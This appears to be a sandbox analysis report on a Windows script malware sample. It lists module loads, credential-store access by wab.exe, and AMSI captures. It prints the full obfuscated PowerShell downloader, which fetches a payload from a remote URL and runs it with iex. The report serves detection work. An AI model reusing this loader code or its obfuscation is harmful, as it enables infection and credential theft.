Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: slc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: Binary string: qm.Core.pdbr source: powershell.exe, 00000005.00000002.2558083418.00000000077B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2561261956.0000000008860000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5vs source: powershell.exe, 00000005.00000002.2549153346.0000000002F8D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2558083418.000000000774E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2561261956.0000000008860000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Core.pdbTm source: powershell.exe, 00000005.00000002.2558083418.00000000077B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2558083418.000000000774E000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("PowerShell", ""cls;write 'Sewerage Oplsningsaftenens ", "", "", "0");
Source: Yara match File source: 00000005.00000002.2561951332.0000000009D33000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3423964489.0000000004633000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Filterable)$global:Unpurchased = [System.Text.Encoding]::ASCII.GetString($Kunstkritikerens)$global:Hytteholds=$Unpurchased.substring($Omnivoracity,$Lehrman)<#Composlaers Smagssags Al
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Smock $Urinalyses $Oniscoid), (Udset @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Nebulized = [AppDomain]::CurrentDomain.GetAssemblies()$global:Sammenbl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Noteformenes20)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Amplificative, $false).DefineType($Rytteri
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Filterable)$global:Unpurchased = [System.Text.Encoding]::ASCII.GetString($Kunstkritikerens)$global:Hytteholds=$Unpurchased.substring($Omnivoracity,$Lehrman)<#Composlaers Smagssags Al
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;U
